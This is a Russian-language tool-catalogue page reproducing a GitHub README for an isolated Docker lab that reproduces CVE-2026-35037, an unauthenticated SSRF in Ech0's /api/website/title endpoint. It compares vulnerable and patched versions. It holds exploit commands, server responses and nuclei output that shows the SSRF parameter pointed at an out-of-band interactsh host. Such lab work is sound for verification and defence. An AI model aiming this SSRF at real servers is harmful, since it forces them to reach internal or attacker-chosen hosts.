Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC_CVE-2026-35037 — POC_CVE-2026-35037 | Kitploit
Инструменты/GitHubGitHub/fineman999/poc_cve-2026-35037
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubfineman999/poc_cve-2026-35037

POC_CVE-2026-35037

POC_CVE-2026-35037

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-35037 Лаборатория Ech0 SSRF

Этот репозиторий содержит локальную изолированную лабораторию для воспроизведения CVE-2026-35037, неавторизованной SSRF-уязвимости в конечной точке GET /api/website/title продукта Ech0.

Лаборатория использует контролируемый локальный сервер подтверждения вместо облачных метаданных или сторонней инфраструктуры.

Краткое описание

  • Продукт: lin-snow/Ech0
  • Уязвимость: Server-Side Request Forgery
  • CVE: CVE-2026-35037
  • GHSA: GHSA-cqgf-f4x7-g6wc
  • Затронутые версии: GHSA указывает <= 4.2.1; NVD описывает версии до 4.2.8
  • Исправленная версия: 4.2.8
  • Конечная точка: GET /api/website/title
  • Параметр: website_url
  • Аутентификация: не требуется в уязвимой версии

Ссылки:

  • https://nvd.nist.gov/vuln/detail/CVE-2026-35037
  • https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc

Файлы

  • docker-compose.yml: запускает Ech0 и локальный HTTP-сервер подтверждения
  • Dockerfile.ech0-lab: собирает Ech0 из официального тега GitHub
  • verify-cve-2026-35037.sh: отправляет контрольный запрос проверки SSRF
  • evidence/index.html: контролируемая HTML-страница с уникальным <title>
  • nuclei/CVE-2026-35037.yaml: шаблон nuclei (кандидат)

Зачем собирать из исходников?

Исторические уязвимые Docker-теги, такие как sn0wl1n/ech0:4.2.1, были недоступны при создании этой лаборатории. Лаборатория собирается из официальных тегов GitHub lin-snow/Ech0:

  • v4.2.1 для уязвимого кандидата
  • v4.2.8 для сравнения с исправленной версией

Локальный Dockerfile также обходит проблемы сборки, наблюдавшиеся с историческим build.Dockerfile.

Требования

  • Docker Engine или Docker Desktop
  • curl
  • Опционально: nuclei

Запускайте это только в локальной изолированной лаборатории. Не используйте эти команды против сторонних систем. Используйте только против систем, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.

Воспроизведение уязвимого поведения

Запустите Ech0 v4.2.1:

root@kitploit:~
ECH0_TAG=4.2.1 docker compose up -d --build

Отправьте контрольный запрос проверки:

root@kitploit:~
sh verify-cve-2026-35037.sh

Ожидаемый уязвимый ответ:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8

{"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}

Подтвердите, что Ech0 достиг контролируемого сервера подтверждения:

root@kitploit:~
docker compose logs evidence

Наблюдаемый лог подтверждения:

root@kitploit:~
ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -

Сравнение с исправленной версией

Запустите Ech0 v4.2.8:

root@kitploit:~
docker compose down -v
ECH0_TAG=4.2.8 docker compose up -d --build

Выполните тот же запрос:

root@kitploit:~
sh verify-cve-2026-35037.sh

Наблюдаемый исправленный ответ:

root@kitploit:~
HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8

{"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}

Проверка с помощью Nuclei

Проверьте шаблон:

root@kitploit:~
nuclei -validate -t nuclei/CVE-2026-35037.yaml

Запустите против уязвимой v4.2.1:

root@kitploit:~
nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277

Наблюдаемый уязвимый результат:

root@kitploit:~
[INF] Using Interactsh Server: oast.online
[CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
[INF] Scan completed in 6.425886625s. 1 matches found.

Запустите против исправленной v4.2.8:

root@kitploit:~
nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277

Наблюдаемый исправленный результат:

root@kitploit:~
[INF] Using Interactsh Server: oast.fun
[INF] Scan completed in 5.974574416s. No results found.

Очистка

root@kitploit:~
docker compose down -v

Примечания

  • Ручная лаборатория использует http://evidence:8080/ внутри сети Docker Compose.
  • Шаблон nuclei использует {{interactsh-url}} и требует поддержки OAST/interactsh.
  • Шаблон nuclei использует {{interactsh-url}}, который по умолчанию обращается к серверам interactsh от ProjectDiscovery, таким как oast.online или oast.fun. Используйте -iserver для переопределения сервера или -ni для отключения interactsh.
  • Лаборатория не обращается к конечным точкам облачных метаданных.
  • Лаборатория не взаимодействует с производственными или сторонними целями, за исключением обычной загрузки зависимостей/образов во время сборки Docker.
Скачать инструмент